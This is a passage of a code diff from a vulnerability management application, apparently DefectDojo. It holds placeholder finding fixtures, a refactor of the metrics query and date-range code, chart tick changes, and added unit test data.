"fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-29", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": true, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 245, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-27", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 22, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 246, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-02", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 22, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 247, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 12345, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-03", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 55, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 248, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 6789, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-27", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": true, + "severity": "Low", + "title": "UID Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 77, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", + "last_reviewed": null, + "is_mitigated": true + } + }, + { + "pk": 249, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 6789, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-04", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "UID Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 77, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 224, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", + "last_reviewed": null + } + } +] \ No newline at end of file diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 8ca345b41f7..d9e01e9a1b8 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -3,8 +3,7 @@ from datetime import date, datetime, timedelta from enum import Enum from functools import partial -from math import ceil -from typing import Any, Callable, NamedTuple, TypeVar, Union +from typing import Any, Callable, NamedTuple, Type, TypeVar, Union from dateutil.relativedelta import relativedelta from django.contrib import messages @@ -35,12 +34,19 @@ ) +def get_metrics_finding_filter_class() -> Type[Union[MetricsFindingFilter, MetricsFindingFilterWithoutObjectLookups]]: + if get_system_setting("filter_string_matching", False): + return MetricsFindingFilterWithoutObjectLookups + else: + return MetricsFindingFilter + + def finding_queries( prod_type: QuerySet[Product_Type], request: HttpRequest, ) -> dict[str, Any]: # Get the initial list of findings the user is authorized to see - findings_query = get_authorized_findings( + all_authorized_findings: QuerySet[Finding] = get_authorized_findings( Permissions.Finding_View, user=request.user, ).select_related( @@ -54,46 +60,47 @@ def finding_queries( "test__test_type", ) - filter_string_matching = get_system_setting("filter_string_matching", False) - finding_filter_class = MetricsFindingFilterWithoutObjectLookups if filter_string_matching else MetricsFindingFilter - findings = finding_filter_class(request.GET, queryset=findings_query) - form = findings.form - findings_qs = queryset_check(findings) - # Quick check to determine if the filters were too tight and filtered everything away - if not findings_qs.exists() and not findings_query.exists(): - findings = findings_query - findings_qs = findings if isinstance(findings, QuerySet) else findings.qs + finding_filter_class = get_metrics_finding_filter_class() + findings_filter = finding_filter_class(request.GET, queryset=all_authorized_findings) + form = findings_filter.form + filtered_findings: QuerySet[Finding] = queryset_check(findings_filter) + # Quick check to determine if the filters were too tight and filtered everything away. If so, fall back to using all + # authorized Findings instead. + if not filtered_findings.exists() and all_authorized_findings.exists(): + filtered_findings = all_authorized_findings messages.add_message( request, messages.ERROR, _("All objects have been filtered away. Displaying all objects"), extra_tags="alert-danger") - start_date, end_date = get_date_range(findings_qs) + start_date, end_date = get_date_range(filtered_findings) # Filter by the date ranges supplied - findings_query = findings_query.filter(date__range=[start_date, end_date]) + all_findings_within_date_range = all_authorized_findings.filter(date__range=[start_date, end_date]) # Get the list of closed and risk accepted findings - findings_closed = findings_query.filter(CLOSED_FINDINGS_QUERY) - accepted_findings = findings_query.filter(ACCEPTED_FINDINGS_QUERY) - active_findings = findings_query.filter(OPEN_FINDINGS_QUERY) + closed_filtered_findings = all_findings_within_date_range.filter(CLOSED_FINDINGS_QUERY) + accepted_filtered_findings = all_findings_within_date_range.filter(ACCEPTED_FINDINGS_QUERY) + active_filtered_findings = all_findings_within_date_range.filter(OPEN_FINDINGS_QUERY) # filter by product type if applicable if len(prod_type) > 0: - findings_query = findings_query.filter(test__engagement__product__prod_type__in=prod_type) - findings_closed = findings_closed.filter(test__engagement__product__prod_type__in=prod_type) - accepted_findings = accepted_findings.filter(test__engagement__product__prod_type__in=prod_type) - active_findings = active_findings.filter(test__engagement__product__prod_type__in=prod_type) + all_findings_within_date_range = all_findings_within_date_range.filter( + test__engagement__product__prod_type__in=prod_type) + closed_filtered_findings = closed_filtered_findings.filter(test__engagement__product__prod_type__in=prod_type) + accepted_filtered_findings = accepted_filtered_findings.filter( + test__engagement__product__prod_type__in=prod_type) + active_filtered_findings = active_filtered_findings.filter(test__engagement__product__prod_type__in=prod_type) # Get the severity counts of risk accepted findings - accepted_findings_counts = severity_count(accepted_findings, "aggregate", "severity") + accepted_findings_counts = severity_count(accepted_filtered_findings, "aggregate", "severity") weeks_between, months_between = period_deltas(start_date, end_date) query_counts_for_period = query_counts( - findings_query, - active_findings, - accepted_findings, + all_findings_within_date_range, + active_filtered_findings, + accepted_filtered_findings, start_date, MetricsType.FINDING, ) @@ -117,9 +124,9 @@ def finding_queries( )[:10] return { - "all": findings_query, - "closed": findings_closed, - "accepted": accepted_findings, + "all": filtered_findings, + "closed": closed_filtered_findings, + "accepted": accepted_filtered_findings, "accepted_count": accepted_findings_counts, "top_ten": top_ten, "monthly_counts": monthly_counts, @@ -454,13 +461,8 @@ def period_deltas(start_date, end_date): :return: A tuple of integers representing (number of weeks between the dates, number of months between the dates) """ r = relativedelta(end_date, start_date) - months_between = (r.years * 12) + r.months - # include current month - months_between += 1 - - weeks_between = int(ceil((((r.years * 12) + r.months) * 4.33) + (r.days / 7))) - if weeks_between <= 0: - weeks_between += 2 + months_between = max((r.years * 12) + r.months, 2) + weeks_between = max((end_date - start_date).days // 7, 2) return weeks_between, months_between diff --git a/dojo/static/dojo/js/metrics.js b/dojo/static/dojo/js/metrics.js index 2e95555d379..2fd518aa3a1 100644 --- a/dojo/static/dojo/js/metrics.js +++ b/dojo/static/dojo/js/metrics.js @@ -103,11 +103,16 @@ function homepage_severity_plot(critical, high, medium, low) { dashboard-metrics.html */ +function getTicks(critical, high, medium, low) { + return [...new Set(critical.concat(high, medium, low).map(x => x[0]))] +} + function opened_per_month(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%y" + timeformat: "%m/%y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -153,7 +158,8 @@ function accepted_per_month(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%y" + timeformat: "%m/%y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -199,7 +205,8 @@ function opened_per_week(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%d/%Y" + timeformat: "%m/%d/%Y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -245,7 +252,8 @@ function accepted_per_week(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%d/%Y" + timeformat: "%m/%d/%Y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 diff --git a/unittests/test_metrics_queries.py b/unittests/test_metrics_queries.py index c52c602ea33..460b426e8b4 100644 --- a/unittests/test_metrics_queries.py +++ b/unittests/test_metrics_queries.py @@ -20,12 +20,43 @@ def add(*args, **kwargs): pass +#### +# Test Findings data +#### +FINDING_1 = {"id": 4, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_2 = {"id": 5, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_3 = {"id": 6, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_4 = {"id": 7, "title": "DUMMY FINDING", "date": date(2017, 12, 31), "sla_start_date": None, "sla_expiration_date": None, "cwe": 1, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": "http://www.example.com", "severity": "High", "description": "TEST finding", "mitigation": "MITIGATION", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 2, "under_defect_review": False, "defect_review_requested_by_id": 2, "is_mitigated": False, "thread_id": 1, "mitigated": None, "mitigated_by_id": None, "reporter_id": 2, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", "line": 100, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_5 = {"id": 24, "title": "Low Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_6 = {"id": 125, "title": "Low Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 55, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "12345", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_7 = {"id": 225, "title": "UID Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 224, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_8 = {"id": 240, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": True, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_9 = {"id": 241, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_10 = {"id": 242, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_11 = {"id": 243, "title": "DUMMY FINDING", "date": date(2017, 12, 31), "sla_start_date": None, "sla_expiration_date": None, "cwe": 1, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": "http://www.example.com", "severity": "High", "description": "TEST finding", "mitigation": "MITIGATION", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 2, "under_defect_review": False, "defect_review_requested_by_id": 2, "is_mitigated": True, "thread_id": 1, "mitigated": None, "mitigated_by_id": None, "reporter_id": 2, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", "line": 100, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_12 = {"id": 244, "title": "Low Impact Test Finding", "date": date(2017, 12, 29), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": True, "verified": True, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, 